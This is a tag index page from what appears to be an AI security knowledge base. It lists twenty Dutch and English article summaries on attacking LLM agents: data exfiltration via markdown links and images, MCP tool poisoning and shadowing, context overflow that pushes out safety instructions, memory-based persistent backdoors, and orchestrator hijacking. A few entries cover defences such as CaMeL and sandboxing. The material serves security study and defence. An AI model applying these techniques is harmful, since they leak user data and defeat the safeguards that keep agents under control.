# agent-security
20 artikelengetagd met “agent-security”
Exfiltratie via links
Hyperlinks, redirects of URL-parameters gebruiken om data uit AI-systemen te exfiltreren via markdown-links, door tools gegenereerde URL's en misbruik van API-callbacks.
Injection via Markdown-afbeeldingen
Markdown-afbeeldingstags met door de aanvaller gecontroleerde URL's injecteren om gespreksdata te exfiltreren via HTTP-afbeeldingsverzoeken.
Permissiegrenzen omzeilen
Escaleren van beperkte naar verhoogde permissies in AI-agentsystemen via scope creep, impliciete overerving van permissies en capability-verwarring.
LangChain Security Deep Dive (Agentic Exploitation)
Uitgebreide beveiligingsanalyse van LangChain en LangGraph, met aandacht voor gevaarlijke standaardinstellingen, aanvallen op chain-compositie, callback-exploitatie, risico's van community-tools en kwetsbaarheden in agent-executors.
Casestudy: MCP tool poisoning-aanvallen (Invariant Labs 2025)
Analysis of tool poisoning vulnerabilities in the Model Context Protocol (MCP) discovered by Invariant Labs, where malicious tool descriptions manipulate AI agents into data exfiltration and unauthorized actions.
CaMeL & Dual LLM-patroon
Architecturale verdedigingspatronen die vertrouwde en niet-vertrouwde verwerking scheiden: Simon Willisons Dual LLM-concept en het CaMeL-framework van Google DeepMind voor het verdedigen van tool-gebruikende AI-agents tegen prompt-injectie.
Aanval op A2A trust boundaries
Advanced walkthrough of exploiting trust boundaries between agents in multi-agent systems using the Agent-to-Agent (A2A) protocol.
Agent context overflow
Walkthrough of overflowing agent context windows to push safety instructions out of the LLM's attention, enabling bypasses of system prompts and guardrails.
Agent loop-hijacking
Advanced walkthrough of hijacking agentic loops to redirect autonomous agent behavior, alter reasoning chains, and achieve persistent control over multi-step agent workflows.
Agentpersistentie via geheugen
Advanced walkthrough of using agent memory systems to create persistent backdoors that survive restarts, updates, and session boundaries.
Misbruik van callbacks in MCP
Advanced walkthrough of abusing MCP callback mechanisms for unauthorized actions, data exfiltration, and privilege escalation in agent-tool interactions.
Parameter injection bij function calling
Walkthrough of manipulating function call parameters through prompt-level techniques, injecting malicious values into LLM-generated API calls.
Tool shadowing in MCP
Advanced walkthrough of creating shadow tools that override legitimate MCP (Model Context Protocol) tools, enabling interception and manipulation of agent-tool interactions.
Geheugen-poisoning stap voor stap
Walkthrough of persisting injection payloads in agent memory systems to achieve long-term compromise of LLM-based agents.
Multi-agent prompt-relay
Advanced walkthrough of relaying prompt injection payloads across multiple agents in a pipeline, achieving cascading compromise of multi-agent systems.
Manipulatie van de orkestrator
Advanced walkthrough of attacking the orchestrator layer in multi-agent systems to gain control over task delegation, agent coordination, and system-wide behavior.
Plugin confusion-aanval
Walkthrough of confusing LLM agents about which plugin or tool to invoke, causing them to call the wrong tool or pass data to unintended destinations.
Injectie via tool calls
Step-by-step walkthrough of injecting malicious parameters into LLM tool and function calls to execute unauthorized actions in agent systems.
Sandboxing en permissiemodellen voor tool-gebruikende agents
Walkthrough for implementing sandboxing and permission models that constrain tool-using LLM agents, covering least-privilege design, parameter validation, execution sandboxes, approval workflows, and audit logging.
Beveiligingstesten van LangChain-applicaties
Step-by-step walkthrough for identifying and exploiting security vulnerabilities in LangChain-based applications, covering chain injection, agent manipulation, tool abuse, retrieval poisoning, and memory extraction attacks.